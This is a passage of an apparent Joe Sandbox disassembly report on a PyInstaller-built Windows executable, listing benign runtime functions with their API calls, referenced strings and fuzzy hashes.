Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction ID: c20a647caed65085ac9ef6587e4d0c427b5eeee04c72160e1ea21244308e7c28
Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction Fuzzy Hash: 2231B322B1CA815AE720B765BC926E66295BF887D8F440132EE8DD3B5DEF3CD5468300

Function 00007FF644872390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6448723C8
DialogBoxIndirectParamW.USER32 ref: 00007FF64487248E
DeleteObject.GDI32 ref: 00007FF6448724C1
DestroyIcon.USER32 ref: 00007FF6448724D3

Strings

Unhandled exception in script, xrefs: 00007FF6448723F8

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
Instruction ID: a82264effe2ec24202ea947d750503a123ebcf04e50caae4233acd9fbfa6f3ac
Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
Instruction Fuzzy Hash: 4831D866A1DA8289EB24FB61AC962F96360FF89B84F440135EE4D87A59EF3CD1458700

Function 00007FF644872B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF64487918F,?,00007FF644873C55), ref: 00007FF644872BA0
MessageBoxW.USER32 ref: 00007FF644872C2A

Strings

Warning, xrefs: 00007FF644872C1D
WARNING, xrefs: 00007FF644872BAF
[PYI-%d:%ls] , xrefs: 00007FF644872BA8

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction ID: f9bf8b7b704f7107f9305663a7eec017aadffaf8da79c1e39107c88bd79daa05
Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction Fuzzy Hash: FE218E62B0CB419AE710BB54F8967AA73A4FB88784F404136EE8D97B59EF3CD245C740

Function 00007FF644872710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF644871B99), ref: 00007FF644872760

Strings

Error [ANSI Fallback], xrefs: 00007FF6448727CF
[PYI-%d:%s] , xrefs: 00007FF644872768
ERROR, xrefs: 00007FF64487276F
Error, xrefs: 00007FF6448727DE

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction ID: f1062883099410325f6b43604b6ad7cfd12f1d3260681a5ed22c0c0078e9b403
Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction Fuzzy Hash: 9F216D32B1CB8186E720FB50B8927E66294BB88784F400135EE8C93A59DF7CD2458740

Function 00007FF644889A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF644889AAD
GetProcAddress.KERNEL32 ref: 00007FF644889AC3
FreeLibrary.KERNEL32 ref: 00007FF644889AEA

Strings

CorExitProcess, xrefs: 00007FF644889ABC
mscoree.dll, xrefs: 00007FF644889AA4

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction ID: 40577bb7c6bfeb44d1998746ff6c2b4668a3fe741a893451acfb609e52a2faeb
Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction Fuzzy Hash: 78F06261B0DB06C5EA10BB24E4C637A6360BF85761F540235DE6E866ECDF6DD484D300

Function 00007FF644899368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF644899390
_set_statfp.LIBCMT ref: 00007FF6448993AB
_set_statfp.LIBCMT ref: 00007FF6448993C7
_set_statfp.LIBCMT ref: 00007FF644899403

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 2a3cb33d07c6d7ce1eacf8864a87d6596df5df05675b3a989bba9e6b98e5f527
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: A4118222E5CE03CAFA64356DE4D33791250AF59360E081634EE6ED67EECE6FE8815100

Function 00007FF64488B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B3AF
FlsSetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B3CE
FlsSetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B3F6
FlsSetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B407
FlsSetValue.KERNEL32(?,?,?,00007FF64488A5A3,?,?,00000000,00007FF64488A83E,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488B418

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
Instruction ID: 99f5a9e2c2bbc384b88379fd951a1a590d0538946315b72c276934a069b0bbb4
Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
Instruction Fuzzy Hash: BF113A20F0D64289FA58B72599D327921815FC47B0F488734EE7ED66DEDE2CF8428301

Function 00007FF64488B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF64488B235
FlsSetValue.KERNEL32 ref: 00007FF64488B254
FlsSetValue.KERNEL32 ref: 00007FF64488B27C
FlsSetValue.KERNEL32 ref: 00007FF64488B28D
FlsSetValue.KERNEL32 ref: 00007FF64488B29E

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
Instruction ID: ac01e6505b14a9b000f88cec93a8ad75612aa772c9034d967890d4e6e7cc83bc
Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
Instruction Fuzzy Hash: 60119320E4D2078DF969B36558D717A21424FC5771F184B34EE3EDA6DBDE2CF8418211

Function 00007FF644885FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF644885FDC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF644886106
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6448861BC

Strings

verbose, xrefs: 00007FF644885FB0

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 1f674e9f8a991638cdd11a2d3807376ee97b4782cdb607caecd41c26ae368c00
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: A291CF22A0CA4689FB61BE24D49277D37A1AF40B94F444936DE5DE73DAEF3CE8458301

Function 00007FF64488FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF64488FEA7

Part of subcall function 00007FF644887A3C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF644887A59

Strings

UTF-8, xrefs: 00007FF64488FE26
UTF-16LEUNICODE, xrefs: 00007FF64488FE45
ccs, xrefs: 00007FF64488FDE2

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction ID: 89d22a8eaef4cfcf86cb4a76e77747351a330e24ebd7da863516a121a4618b7c
Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction Fuzzy Hash: DC818972E0C2538DE775BE29818227936A1AF11B88F558035DF09DB28FDF2DE9029301

Function 00007FF64487D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF64487D673
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF64487D70A
RtlUnwindEx.KERNEL32 ref: 00007FF64487D764

Strings

csm, xrefs: 00007FF64487D6F1

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction ID: 9ac13814da8063900a28e86598f13c1da37cfc9eee31346957f08f3bb5c07527
Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction Fuzzy Hash: 04518C26B1D6028EDB14BB15E8A5A7873E1EB44B98F148136DE4E8778CEF7CE841C700

Function 00007FF64487EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF64487EF37
_CallSETranslator.LIBVCRUNTIME ref: 00007FF64487EF83

Strings

RCC, xrefs: 00007FF64487EF53
MOC, xrefs: 00007FF64487EF4B

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction ID: bf69efbd19a559e2910b02a1546d6312629e44a9c7fc2dbbe2e400cd7e00b4a3
Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction Fuzzy Hash: 71617532A0CBC589E761BB15E8913A9B7A0FB95794F044225EF9C47B5ADF7CD190CB00

Function 00007FF64487F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF64487F2B0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF64487F398

Strings

csm, xrefs: 00007FF64487F2D2
csm, xrefs: 00007FF64487F3EA

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction ID: 78056e1bd39a6ad11124c5a0210f35a5339a81971ac2f6d7ea45a5918c4d0b4e
Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction Fuzzy Hash: 51517D32B0C6428EEB64BB2698E626877A4FB55B84F144136DF5D87B9ACF3CE450C701

Function 00007FF644877E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF64487352C,?,00000000,00007FF644873F1B), ref: 00007FF644877F32

Strings

\, xrefs: 00007FF644877E97
%.*s, xrefs: 00007FF644877EEB
%s%c, xrefs: 00007FF644877EA4

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
Instruction ID: 570cc693dccab748ba75edfcd3add18504b94ead668c671b8dee13190dde80b7
Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
Instruction Fuzzy Hash: 3C31872171DAC149FA61BB11ECA17AA6294FB84BE4F440231EE6D87BCDDE2CE645C700

Function 00007FF644872810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF6448728EA

Strings

[PYI-%d:%ls] , xrefs: 00007FF644872868
ERROR, xrefs: 00007FF64487286F
Error, xrefs: 00007FF6448728DD

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction ID: 5ef64e4ba75940d2785d09b4e2bd5248f874b82a868590e140cf925209afb576
Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction Fuzzy Hash: 80217F62B0CB4196E710BB54B8967AA63A4FB88784F404136EE8D97659EF3CD245C740

Function 00007FF64488C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF64488C61F
WriteFile.KERNEL32 ref: 00007FF64488C8E7
WriteFile.KERNEL32 ref: 00007FF64488C92D
GetLastError.KERNEL32 ref: 00007FF64488C9E3

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction ID: eed41a1321574293fa4bb704efeaa59c7f01b00ccf3a77dafb9d5160e58d5464
Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction Fuzzy Hash: 23D1E172B1CA818DE711EF69D4812AC37A1FB65B98B444236DE5ED7B8DDE38D41AC300

Function 00007FF64488F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF64488FA7C
_get_daylight.LIBCMT ref: 00007FF64488FA8D
_get_daylight.LIBCMT ref: 00007FF64488FA9E
_isindst.LIBCMT ref: 00007FF64488FB69

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction ID: c3c9967bac5b45d08fd19d6a38c68faefe2a287d065003f59dee31030e702ab2
Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction Fuzzy Hash: ED51A672F085118EEB14FF6499E66BC2765AF54369F500235DE1E92AEADF3CE442C600

Function 00007FF64488577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF6448857AF
GetFileInformationByHandle.KERNEL32 ref: 00007FF644885811
GetLastError.KERNEL32 ref: 00007FF6448858A2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6448856B4), ref: 00007FF6448858EE

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

